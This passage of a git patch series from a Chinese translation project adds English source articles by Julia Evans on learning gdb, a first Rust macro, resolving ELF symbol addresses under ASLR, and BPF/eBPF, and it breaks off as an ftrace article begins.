+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2016/08/10/how-does-gdb-work/
+
+作者:[ Julia Evans][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca/
+[1]:http://jvns.ca/blog/2016/06/12/a-weird-system-call-process-vm-readv/
+[2]:https://stackoverflow.com/questions/25047329/how-to-get-struct-member-offset-from-dwarf-info
+[3]:http://www.brendangregg.com/blog/2016-08-09/gdb-example-ncurses.html
From 109c69e45e7e4831cf50578ea21b4490effff504 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:38:58 +0800
Subject: [PATCH 303/371] =?UTF-8?q?20180113-3=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20140210 Three steps to learning GDB.md | 113 ++++++++++++++++++
1 file changed, 113 insertions(+)
create mode 100644 sources/tech/20140210 Three steps to learning GDB.md
diff --git a/sources/tech/20140210 Three steps to learning GDB.md b/sources/tech/20140210 Three steps to learning GDB.md
new file mode 100644
index 0000000000..94279a2374
--- /dev/null
+++ b/sources/tech/20140210 Three steps to learning GDB.md
@@ -0,0 +1,113 @@
+Three steps to learning GDB
+============================================================
+
+Debugging C programs used to scare me a lot. Then I was writing my [operating system][2] and I had so many bugs to debug! I was extremely fortunate to be using the emulator qemu, which lets me attach a debugger to my operating system. The debugger is called `gdb`.
+
+I’m going to explain a couple of small things you can do with `gdb`, because I found it really confusing to get started. We’re going to set a breakpoint and examine some memory in a tiny program.
+
+### 1\. Set breakpoints
+
+If you’ve ever used a debugger before, you’ve probably set a breakpoint.
+
+Here’s the program that we’re going to be “debugging” (though there aren’t any bugs):
+
+```
+#include
+void do_thing() {
+ printf("Hi!\n");
+}
+int main() {
+ do_thing();
+}
+
+```
+
+Save this as `hello.c`. We can debug it with gdb like this:
+
+```
+bork@kiwi ~> gcc -g hello.c -o hello
+bork@kiwi ~> cat
+bork@kiwi ~> gdb ./hello
+```
+
+This compiles `hello.c` with debugging symbols (so that gdb can do better work), and gives us kind of scary prompt that just says
+
+`(gdb)`
+
+We can then set a breakpoint using the `break` command, and then `run` the program.
+
+```
+(gdb) break do_thing
+Breakpoint 1 at 0x4004f8
+(gdb) run
+Starting program: /home/bork/hello
+
+Breakpoint 1, 0x00000000004004f8 in do_thing ()
+```
+
+This stops the program at the beginning of `do_thing`.
+
+We can find out where we are in the call stack with `where`: (thanks to [@mgedmin][3] for the tip)
+
+```
+(gdb) where
+#0 do_thing () at hello.c:3
+#1 0x08050cdb in main () at hello.c:6
+(gdb)
+```
+
+### 2\. Look at some assembly code
+
+We can look at the assembly code for our function using the `disassemble`command! This is cool. This is x86 assembly. I don’t understand it very well, but the line that says `callq` is what does the `printf` function call.
+
+```
+(gdb) disassemble do_thing
+Dump of assembler code for function do_thing:
+ 0x00000000004004f4 <+0>: push %rbp
+ 0x00000000004004f5 <+1>: mov %rsp,%rbp
+=> 0x00000000004004f8 <+4>: mov $0x40060c,%edi
+ 0x00000000004004fd <+9>: callq 0x4003f0
+ 0x0000000000400502 <+14>: pop %rbp
+ 0x0000000000400503 <+15>: retq
+```
+
+You can also shorten `disassemble` to `disas`
+
+### 3\. Examine some memory!
+
+The main thing I used `gdb` for when I was debugging my kernel was to examine regions of memory to make sure they were what I thought they were. The command for examining memory is `examine`, or `x` for short. We’re going to use `x`.
+
+From looking at that assembly above, it seems like `0x40060c` might be the address of the string we’re printing. Let’s check!
+
+```
+(gdb) x/s 0x40060c
+0x40060c: "Hi!"
+```
+
+It is! Neat! Look at that. The `/s` part of `x/s` means “show it to me like it’s a string”. I could also have said “show me 10 characters” like this:
+
+```
+(gdb) x/10c 0x40060c
+0x40060c: 72 'H' 105 'i' 33 '!' 0 '\000' 1 '\001' 27 '\033' 3 '\003' 59 ';'
+0x400614: 52 '4' 0 '\000'
+```
+
+You can see that the first four characters are ‘H’, ‘i’, and ‘!’, and ‘\0’ and then after that there’s more unrelated stuff.
+
+I know that gdb does lots of other stuff, but I still don’t know it very well and `x`and `break` got me pretty far. You can read the [documentation for examining memory][4].
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2014/02/10/three-steps-to-learning-gdb/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://jvns.ca/categories/spytools
+[2]:http://jvns.ca/blog/categories/kernel
+[3]:https://twitter.com/mgedmin
+[4]:https://ftp.gnu.org/old-gnu/Manuals/gdb-5.1.1/html_chapter/gdb_9.html#SEC56
From 519daa8935d45c5a17e73e21770ee11d93344bd6 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:40:22 +0800
Subject: [PATCH 304/371] =?UTF-8?q?20180113-4=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171224 My first Rust macro.md | 145 +++++++++++++++++++
1 file changed, 145 insertions(+)
create mode 100644 sources/tech/20171224 My first Rust macro.md
diff --git a/sources/tech/20171224 My first Rust macro.md b/sources/tech/20171224 My first Rust macro.md
new file mode 100644
index 0000000000..a8002e050b
--- /dev/null
+++ b/sources/tech/20171224 My first Rust macro.md
@@ -0,0 +1,145 @@
+My first Rust macro
+============================================================
+
+Last night I wrote a Rust macro for the first time!! The most striking thing to me about this was how **easy** it was – I kind of expected it to be a weird hard finicky thing, and instead I found that I could go from “I don’t know how macros work but I think I could do this with a macro” to “wow I’m done” in less than an hour.
+
+I used [these examples][2] to figure out how to write my macro.
+
+### what’s a macro?
+
+There’s more than one kind of macro in Rust –
+
+* macros defined using `macro_rules` (they have an exclamation mark and you call them like functions – `my_macro!()`)
+
+* “syntax extensions” / “procedural macros” like `#[derive(Debug)]` (you put these like annotations on your functions)
+
+* built-in macros like `println!`
+
+[Macros in Rust][3] and [Macros in Rust part II][4] seems like a nice overview of the different kinds with examples
+
+I’m not actually going to try to explain what a macro **is**, instead I will just show you what I used a macro for yesterday and hopefully that will be interesting. I’m going to be talking about `macro_rules!`, I don’t understand syntax extension/procedural macros yet.
+
+### compiling the `get_stack_trace` function for 30 different Ruby versions
+
+I’d written some functions that got the stack trace out of a running Ruby program (`get_stack_trace`). But the function I wrote only worked for Ruby 2.2.0 – here’s what it looked like. Basically it imported some structs from `bindings::ruby_2_2_0` and then used them.
+
+```
+use bindings::ruby_2_2_0::{rb_control_frame_struct, rb_thread_t, RString};
+fn get_stack_trace(pid: pid_t) -> Vec {
+ // some code using rb_control_frame_struct, rb_thread_t, RString
+}
+
+```
+
+Let’s say I wanted to instead have a version of `get_stack_trace` that worked for Ruby 2.1.6. `bindings::ruby_2_2_0` and `bindings::ruby_2_1_6` had basically all the same structs in them. But `bindings::ruby_2_1_6::rb_thread_t` wasn’t the **same** as `bindings::ruby_2_2_0::rb_thread_t`, it just had the same name and most of the same struct members.
+
+So I could implement a working function for Ruby 2.1.6 really easily! I just need to basically replace `2_2_0` for `2_1_6`, and then the compiler would generate different code (because `rb_thread_t` is different). Here’s a sketch of what the Ruby 2.1.6 version would look like:
+
+```
+use bindings::ruby_2_1_6::{rb_control_frame_struct, rb_thread_t, RString};
+fn get_stack_trace(pid: pid_t) -> Vec {
+ // some code using rb_control_frame_struct, rb_thread_t, RString
+}
+
+```
+
+### what I wanted to do
+
+I basically wanted to write code like this, to generate a `get_stack_trace` function for every Ruby version. The code inside `get_stack_trace` would be the same in every case, it’s just the `use bindings::ruby_2_1_3` that needed to be different
+
+```
+pub mod ruby_2_1_3 {
+ use bindings::ruby_2_1_3::{rb_control_frame_struct, rb_thread_t, RString};
+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // insert code here
+ }
+}
+pub mod ruby_2_1_4 {
+ use bindings::ruby_2_1_4::{rb_control_frame_struct, rb_thread_t, RString};
+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // same code
+ }
+}
+pub mod ruby_2_1_5 {
+ use bindings::ruby_2_1_5::{rb_control_frame_struct, rb_thread_t, RString};
+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // same code
+ }
+}
+pub mod ruby_2_1_6 {
+ use bindings::ruby_2_1_6::{rb_control_frame_struct, rb_thread_t, RString};
+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // same code
+ }
+}
+
+```
+
+### macros to the rescue!
+
+This really repetitive thing was I wanted to do was a GREAT fit for macros. Here’s what using `macro_rules!` to do this looked like!
+
+```
+macro_rules! ruby_bindings(
+ ($ruby_version:ident) => (
+ pub mod $ruby_version {
+ use bindings::$ruby_version::{rb_control_frame_struct, rb_thread_t, RString};
+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // insert code here
+ }
+ }
+));
+
+```
+
+I basically just needed to put my code in and insert `$ruby_version` in the places I wanted it to go in. So simple! I literally just looked at an example, tried the first thing I thought would work, and it worked pretty much right away.
+
+(the [actual code][5] is more lines and messier but the usage of macros is exactly as simple in this example)
+
+I was SO HAPPY about this because I’d been worried getting this to work would be hard but instead it was so easy!!
+
+### dispatching to the right code
+
+Then I wrote some super simple dispatch code to call the right code depending on which Ruby version was running!
+
+```
+ let version = get_api_version(pid);
+ let stack_trace_function = match version.as_ref() {
+ "2.1.1" => stack_trace::ruby_2_1_1::get_stack_trace,
+ "2.1.2" => stack_trace::ruby_2_1_2::get_stack_trace,
+ "2.1.3" => stack_trace::ruby_2_1_3::get_stack_trace,
+ "2.1.4" => stack_trace::ruby_2_1_4::get_stack_trace,
+ "2.1.5" => stack_trace::ruby_2_1_5::get_stack_trace,
+ "2.1.6" => stack_trace::ruby_2_1_6::get_stack_trace,
+ "2.1.7" => stack_trace::ruby_2_1_7::get_stack_trace,
+ "2.1.8" => stack_trace::ruby_2_1_8::get_stack_trace,
+ // and like 20 more versions
+ _ => panic!("OH NO OH NO OH NO"),
+ };
+
+```
+
+### it works!
+
+I tried out my prototype, and it totally worked! The same program could get stack traces out the running Ruby program for all of the ~10 different Ruby versions I tried – it figured which Ruby version was running, called the right code, and got me stack traces!!
+
+Previously I’d compile a version for Ruby 2.2.0 but then if I tried to use it for any other Ruby version it would crash, so this was a huge improvement.
+
+There are still more issues with this approach that I need to sort out. The two main ones right now are: firstly the ruby binary that ships with Debian doesn’t have symbols and I need the address of the current thread, and secondly it’s still possible that `#ifdefs` will ruin my day.
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2017/12/24/my-first-rust-macro/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://jvns.ca/categories/ruby-profiler
+[2]:https://gist.github.com/jfager/5936197
+[3]:https://www.ncameron.org/blog/macros-in-rust-pt1/
+[4]:https://www.ncameron.org/blog/macros-in-rust-pt2/
+[5]:https://github.com/jvns/ruby-stacktrace/blob/b0b92863564e54da59ea7f066aff5bb0d92a4968/src/lib.rs#L249-L393
From 5c315017c152d5cb566ef579f9df293530451058 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:42:02 +0800
Subject: [PATCH 305/371] =?UTF-8?q?20180113-5=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ures resolving symbol addresses is hard.md | 163 ++++++++++++++++++
1 file changed, 163 insertions(+)
create mode 100644 sources/tech/20180109 Profiler adventures resolving symbol addresses is hard.md
diff --git a/sources/tech/20180109 Profiler adventures resolving symbol addresses is hard.md b/sources/tech/20180109 Profiler adventures resolving symbol addresses is hard.md
new file mode 100644
index 0000000000..971f575f5f
--- /dev/null
+++ b/sources/tech/20180109 Profiler adventures resolving symbol addresses is hard.md
@@ -0,0 +1,163 @@
+Profiler adventures: resolving symbol addresses is hard!
+============================================================
+
+The other day I posted [How does gdb call functions?][1]. In that post I said:
+
+> Using the symbol table to figure out the address of the function you want to call is pretty straightforward
+
+Unsurprisingly, it turns out that figuring out the address in memory corresponding to a given symbol is actually not really that straightforward. This is actually something I’ve been doing in my profiler, and I think it’s interesting, so I thought I’d write about it!
+
+Basically the problem I’ve been trying to solve is – I have a symbol (like `ruby_api_version`), and I want to figure out which address that symbol is mapped to in my target process’s memory (so that I can get the data in it, like the Ruby process’s Ruby version). So far I’ve run into (and fixed!) 3 issues when trying to do this:
+
+1. When binaries are loaded into memory, they’re loaded at a random address (so I can’t just read the symbol table)
+
+2. The symbol I want isn’t necessary in the “main” binary (`/proc/PID/exe`, sometimes it’s in some other dynamically linked library)
+
+3. I need to look at the ELF program header to adjust which address I look at for the symbol
+
+I’ll start with some background, and then explain these 3 things! (I actually don’t know what gdb does)
+
+### what’s a symbol?
+
+Most binaries have functions and variables in them. For instance, Perl has a global variable called `PL_bincompat_options` and a function called `Perl_sv_catpv_mg`.
+
+Sometimes binaries need to look up functions from another binary (for example, if the binary is a dynamically linked library, you need to look up its functions by name). Also sometimes you’re debugging your code and you want to know what function an address corresponds to.
+
+Symbols are how you look up functions / variables in a binary. They’re in a section called the “symbol table”. The symbol table is basically an index for your binary! Sometimes they’re missing (“stripped”). There are a lot of binary formats, but this post is just about the usual binary format on Linux: ELF.
+
+### how do you get the symbol table of a binary?
+
+A thing that I learned today (or at least learned and then forgot) is that there are 2 possible sections symbols can live in: `.symtab` and `.dynsym`. `.dynsym` is the “dynamic symbol table”. According to [this page][2], the dynsym is a smaller version of the symtab that only contains global symbols.
+
+There are at least 3 ways to read the symbol table of a binary on Linux: you can use nm, objdump, or readelf.
+
+* **read the .symtab**: `nm $FILE`, `objdump --syms $FILE`, `readelf -a $FILE`
+
+* **read the .dynsym**: `nm -D $FILE`, `objdump --dynamic-syms $FILE`, `readelf -a $FILE`
+
+`readelf -a` is the same in both cases because `readelf -a` just shows you everything in an ELF file. It’s my favorite because I don’t need to guess where the information I want is, I can just print out everything and then use grep.
+
+Here’s an example of some of the symbols in `/usr/bin/perl`. You can see that each symbol has a **name**, a **value**, and a **type**. The value is basically the offset of the code/data corresponding to that symbol in the binary. (except some symbols have value 0\. I think that has something to do with dynamic linking but I don’t understand it so we’re not going to get into it)
+
+```
+$ readelf -a /usr/bin/perl
+...
+ Num: Value Size Type Ndx Name
+ 523: 00000000004d6590 49 FUNC 14 Perl_sv_catpv_mg
+ 524: 0000000000543410 7 FUNC 14 Perl_sv_copypv
+ 525: 00000000005a43e0 202 OBJECT 16 PL_bincompat_options
+ 526: 00000000004e6d20 2427 FUNC 14 Perl_pp_ucfirst
+ 527: 000000000044a8c0 1561 FUNC 14 Perl_Gv_AMupdate
+...
+
+```
+
+### the question we want to answer: what address is a symbol mapped to?
+
+That’s enough background!
+
+Now – suppose I’m a debugger, and I want to know what address the `ruby_api_version` symbol is mapped to. Let’s use readelf to look at the relevant Ruby binary!
+
+```
+readelf -a ~/.rbenv/versions/2.1.6/bin/ruby | grep ruby_api_version
+ 365: 00000000001f9180 12 OBJECT GLOBAL DEFAULT 15 ruby_api_version
+
+```
+
+Neat! The offset of `ruby_api_version` is `0x1f9180`. We’re done, right? Of course not! :)
+
+### Problem 1: ASLR (Address space layout randomization)
+
+Here’s the first issue: when Linux loads a binary into memory (like `~/.rbenv/versions/2.1.6/bin/ruby`), it doesn’t just load it at the `0` address. Instead, it usually adds a random offset. Wikipedia’s article on ASLR explains why:
+
+> Address space layout randomization (ASLR) is a memory-protection process for operating systems (OSes) that guards against buffer-overflow attacks by randomizing the location where system executables are loaded into memory.
+
+We can see this happening in practice: I started `/home/bork/.rbenv/versions/2.1.6/bin/ruby` 3 times and every time the process gets mapped to a different place in memory. (`0x56121c86f000`, `0x55f440b43000`, `0x56163334a000`)
+
+Here we’re meeting our good friend `/proc/$PID/maps` – this file contains a list of memory maps for a process. The memory maps tell us every address range in the process’s virtual memory (it turns out virtual memory isn’t contiguous! Instead process get a bunch of possibly-disjoint memory maps!). This file is so useful! You can find the address of the stack, the heap, every dynamically loaded library, anonymous memory maps, and probably more.
+
+```
+$ cat /proc/(pgrep -f 2.1.6)/maps | grep 'bin/ruby'
+56121c86f000-56121caf0000 r-xp 00000000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+56121ccf0000-56121ccf5000 r--p 00281000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+56121ccf5000-56121ccf7000 rw-p 00286000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+$ cat /proc/(pgrep -f 2.1.6)/maps | grep 'bin/ruby'
+55f440b43000-55f440dc4000 r-xp 00000000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+55f440fc4000-55f440fc9000 r--p 00281000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+55f440fc9000-55f440fcb000 rw-p 00286000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+$ cat /proc/(pgrep -f 2.1.6)/maps | grep 'bin/ruby'
+56163334a000-5616335cb000 r-xp 00000000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+5616337cb000-5616337d0000 r--p 00281000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+5616337d0000-5616337d2000 rw-p 00286000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+
+```
+
+Okay, so in the last example we see that our binary is mapped at `0x56163334a000`. If we combine this with the knowledge that `ruby_api_version` is at `0x1f9180`, then that means that we just need to look that the address `0x1f9180 + 0x56163334a000` to find our variable, right?
+
+Yes! In this case, that works. But in other cases it won’t! So that brings us to problem 2.
+
+### Problem 2: dynamically loaded libraries
+
+Next up, I tried running system Ruby: `/usr/bin/ruby`. This binary has basically no symbols at all! Disaster! In particular it does not have a `ruby_api_version`symbol.
+
+But when I tried to print the `ruby_api_version` variable with gdb, it worked!!! Where was gdb finding my symbol? I found the answer with the help of our good friend: `/proc/PID/maps`
+
+It turns out that `/usr/bin/ruby` dynamically loads a library called `libruby-2.3`. You can see it in the memory maps here:
+
+```
+$ cat /proc/(pgrep -f /usr/bin/ruby)/maps | grep libruby
+7f2c5d789000-7f2c5d9f1000 r-xp 00000000 00:14 /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0
+7f2c5d9f1000-7f2c5dbf0000 ---p 00268000 00:14 /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0
+7f2c5dbf0000-7f2c5dbf6000 r--p 00267000 00:14 /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0
+7f2c5dbf6000-7f2c5dbf7000 rw-p 0026d000 00:14 /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0
+
+```
+
+And if we read it with `readelf`, we find the address of that symbol!
+
+```
+readelf -a /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0 | grep ruby_api_version
+ 374: 00000000001c72f0 12 OBJECT GLOBAL DEFAULT 13 ruby_api_version
+
+```
+
+So in this case the address of the symbol we want is `0x7f2c5d789000` (the start of the libruby-2.3 memory map) plus `0x1c72f0`. Nice! But we’re still not done. There is (at least) one more mystery!
+
+### Problem 3: the `vaddr` offset in the ELF program header
+
+This one I just figured out today so it’s the one I have the shakiest understanding of. Here’s what happened.
+
+I was running system ruby on Ubuntu 14.04: Ruby 1.9.3\. And my usual code (find the libruby map, get its address, get the symbol offset, add them up) wasn’t working!!! I was confused.
+
+But I’d asked Julian if he knew of any weird stuff I need to worry about a while back and he said “well, you should read the code for `dlsym`, you’re trying to do basically the same thing”. So I decided to, instead of randomly guessing, go read the code for `dlsym`.
+
+The man page for `dlsym` says “dlsym, dlvsym - obtain address of a symbol in a shared object or executable”. Perfect!!
+
+[Here’s the dlsym code from musl I read][3]. (musl is like glibc, but, different. Maybe easier to read? I don’t understand it that well.)
+
+The dlsym code says (on line 1468) `return def.dso->base + def.sym->st_value;` That sounds like what I’m doing!! But what’s `dso->base`? It looks like `base = map - addr_min;`, and `addr_min = ph->p_vaddr;`. (there’s also some stuff that makes sure `addr_min` is aligned with the page size which I should maybe pay attention to.)
+
+So the code I want is something like `map_base - ph->p_vaddr + sym->st_value`.
+
+I looked up this `vaddr` thing in the ELF program header, subtracted it from my calculation, and voilà! It worked!!!
+
+### there are probably more problems!
+
+I imagine I will discover even more ways that I am calculating the symbol address wrong. It’s interesting that such a seemingly simple thing (“what’s the address of this symbol?”) is so complicated!
+
+It would be nice to be able to just call `dlsym` and have it do all the right calculations for me, but I think I can’t because the symbol is in a different process. Maybe I’m wrong about that though! I would like to be wrong about that. If you know an easier way to do all this I would very much like to know!
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2018/01/09/resolving-symbol-addresses/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://jvns.ca/blog/2018/01/04/how-does-gdb-call-functions/
+[2]:https://blogs.oracle.com/ali/inside-elf-symbol-tables
+[3]:https://github.com/esmil/musl/blob/194f9cf93da8ae62491b7386edf481ea8565ae4e/src/ldso/dynlink.c#L1451
From 166be2bb0d2c6c6e94e72709f0dcc43c3c7a8a05 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:44:00 +0800
Subject: [PATCH 306/371] =?UTF-8?q?20180113-6=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../tech/20170628 Notes on BPF and eBPF.md | 152 ++++++++++++++++++
1 file changed, 152 insertions(+)
create mode 100644 sources/tech/20170628 Notes on BPF and eBPF.md
diff --git a/sources/tech/20170628 Notes on BPF and eBPF.md b/sources/tech/20170628 Notes on BPF and eBPF.md
new file mode 100644
index 0000000000..264319bf97
--- /dev/null
+++ b/sources/tech/20170628 Notes on BPF and eBPF.md
@@ -0,0 +1,152 @@
+Notes on BPF & eBPF
+============================================================
+
+Today it was Papers We Love, my favorite meetup! Today [Suchakra Sharma][6]([@tuxology][7] on twitter/github) gave a GREAT talk about the original BPF paper and recent work in Linux on eBPF. It really made me want to go write eBPF programs!
+
+The paper is [The BSD Packet Filter: A New Architecture for User-level Packet Capture][8]
+
+I wanted to write some notes on the talk here because I thought it was super super good.
+
+To start, here are the [slides][9] and a [pdf][10]. The pdf is good because there are links at the end and in the PDF you can click the links.
+
+### what’s BPF?
+
+Before BPF, if you wanted to do packet filtering you had to copy all the packets into userspace and then filter them there (with “tap”).
+
+this had 2 problems:
+
+1. if you filter in userspace, it means you have to copy all the packets into userspace, copying data is expensive
+
+2. the filtering algorithms people were using were inefficient
+
+The solution to problem #1 seems sort of obvious, move the filtering logic into the kernel somehow. Okay. (though the details of how that’s done isn’t obvious, we’ll talk about that in a second)
+
+But why were the filtering algorithms inefficient! Well!!
+
+If you run `tcpdump host foo` it actually runs a relatively complicated query, which you could represent with this tree:
+
+![](https://jvns.ca/images/bpf-1.png)
+
+Evaluating this tree is kind of expensive. so the first insight is that you can actually represent this tree in a simpler way, like this:
+
+![](https://jvns.ca/images/bpf-2.png)
+
+Then if you have `ether.type = IP` and `ip.src = foo` you automatically know that the packet matches `host foo`, you don’t need to check anything else. So this data structure (they call it a “control flow graph” or “CFG”) is a way better representation of the program you actually want to execute to check matches than the tree we started with.
+
+### How BPF works in the kernel
+
+The main important here is that packets are just arrays of bytes. BPF programs run on these arrays of bytes. They’re not allowed to have loops but they _can_ have smart stuff to figure out the length of the IP header (IPv6 & IPv4 are different lengths!) and then find the TCP port based on that length
+
+```
+x = ip_header_length
+port = *(packet_start + x + port_offset)
+
+```
+
+(it looks different from that but it’s basically the same). There’s a nice description of the virtual machine in the paper/slides so I won’t explain it.
+
+When you run `tcpdump host foo` this is what happens, as far as I understand
+
+1. convert `host foo` into an efficient DAG of the rules
+
+2. convert that DAG into a BPF program (in BPF bytecode) for the BPF virtual machine
+
+3. Send the BPF bytecode to the Linux kernel, which verifies it
+
+4. compile the BPF bytecode program into native code. For example [here’s the JIT code for ARM][1] and for [x86][2]
+
+5. when packets come in, Linux runs the native code to decide if that packet should be filtered or not. It’l often run only 100-200 CPU instructions for each packet that needs to be processed, which is super fast!
+
+### the present: eBPF
+
+But BPF has been around for a long time! Now we live in the EXCITING FUTURE which is eBPF. I’d heard about eBPF a bunch before but I felt like this helped me put the pieces together a little better. (i wrote this [XDP & eBPF post][11]back in April when I was at netdev)
+
+some facts about eBPF:
+
+* eBPF programs have their own bytecode language, and are compiled from that bytecode language into native code in the kernel, just like BPF programs
+
+* eBPF programs run in the kernel
+
+* eBPF programs can’t access arbitrary kernel memory. Instead the kernel provides functions to get at some restricted subset of things.
+
+* they _can_ communicate with userspace programs through BPF maps
+
+* there’s a `bpf` syscall as of Linux 3.18
+
+### kprobes & eBPF
+
+You can pick a function (any function!) in the Linux kernel and execute a program that you write every time that function happens. This seems really amazing and magical.
+
+For example! There’s this [BPF program called disksnoop][12] which tracks when you start/finish writing a block to disk. Here’s a snippet from the code:
+
+```
+BPF_HASH(start, struct request *);
+void trace_start(struct pt_regs *ctx, struct request *req) {
+ // stash start timestamp by request ptr
+ u64 ts = bpf_ktime_get_ns();
+ start.update(&req, &ts);
+}
+...
+b.attach_kprobe(event="blk_start_request", fn_name="trace_start")
+b.attach_kprobe(event="blk_mq_start_request", fn_name="trace_start")
+
+```
+
+This basically declares a BPF hash (which the program uses to keep track of when the request starts / finishes), a function called `trace_start` which is going to be compiled into BPF bytecode, and attaches `trace_start` to the `blk_start_request` kernel function.
+
+This is all using the `bcc` framework which lets you write Python-ish programs that generate BPF code. You can find it (it has tons of example programs) at[https://github.com/iovisor/bcc][13]
+
+### uprobes & eBPF
+
+So I sort of knew you could attach eBPF programs to kernel functions, but I didn’t realize you could attach eBPF programs to userspace functions! That’s really exciting. Here’s [an example of counting malloc calls in Python using an eBPF program][14].
+
+### things you can attach eBPF programs to
+
+* network cards, with XDP (which I wrote about a while back)
+
+* tc egress/ingress (in the network stack)
+
+* kprobes (any kernel function)
+
+* uprobes (any userspace function apparently ?? like in any C program with symbols.)
+
+* probes that were built for dtrace called “USDT probes” (like [these mysql probes][3]). Here’s an [example program using dtrace probes][4]
+
+* [the JVM][5]
+
+* tracepoints (not sure what that is yet)
+
+* seccomp / landlock security things
+
+* a bunch more things
+
+### this talk was super cool
+
+There are a bunch of great links in the slides and in [LINKS.md][15] in the iovisor repository. It is late now but soon I want to actually write my first eBPF program!
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2017/06/28/notes-on-bpf---ebpf/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca/
+[1]:https://github.com/torvalds/linux/blob/v4.10/arch/arm/net/bpf_jit_32.c#L512
+[2]:https://github.com/torvalds/linux/blob/v3.18/arch/x86/net/bpf_jit_comp.c#L189
+[3]:https://dev.mysql.com/doc/refman/5.7/en/dba-dtrace-ref-query.html
+[4]:https://github.com/iovisor/bcc/blob/master/examples/tracing/mysqld_query.py
+[5]:http://blogs.microsoft.co.il/sasha/2016/03/31/probing-the-jvm-with-bpfbcc/
+[6]:http://suchakra.in/
+[7]:https://twitter.com/tuxology
+[8]:http://www.vodun.org/papers/net-papers/van_jacobson_the_bpf_packet_filter.pdf
+[9]:https://speakerdeck.com/tuxology/the-bsd-packet-filter
+[10]:http://step.polymtl.ca/~suchakra/PWL-Jun28-MTL.pdf
+[11]:https://jvns.ca/blog/2017/04/07/xdp-bpf-tutorial/
+[12]:https://github.com/iovisor/bcc/blob/0c8c179fc1283600887efa46fe428022efc4151b/examples/tracing/disksnoop.py
+[13]:https://github.com/iovisor/bcc
+[14]:https://github.com/iovisor/bcc/blob/00f662dbea87a071714913e5c7382687fef6a508/tests/lua/test_uprobes.lua
+[15]:https://github.com/iovisor/bcc/blob/master/LINKS.md
From 4757374a5f3c8c320b3cc99a2179b402bf7c49b3 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:46:19 +0800
Subject: [PATCH 307/371] =?UTF-8?q?20180113-7=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...0319 ftrace trace your kernel functions.md | 284 ++++++++++++++++++
1 file changed, 284 insertions(+)
create mode 100644 sources/tech/20170319 ftrace trace your kernel functions.md
diff --git a/sources/tech/20170319 ftrace trace your kernel functions.md b/sources/tech/20170319 ftrace trace your kernel functions.md
new file mode 100644
index 0000000000..0ff3fd6416
--- /dev/null
+++ b/sources/tech/20170319 ftrace trace your kernel functions.md
@@ -0,0 +1,284 @@
+ftrace: trace your kernel functions!
+============================================================
+
+Hello! Today we’re going to talk about a debugging tool we haven’t talked about much before on this blog: ftrace. What could be more exciting than a new debugging tool?!
+
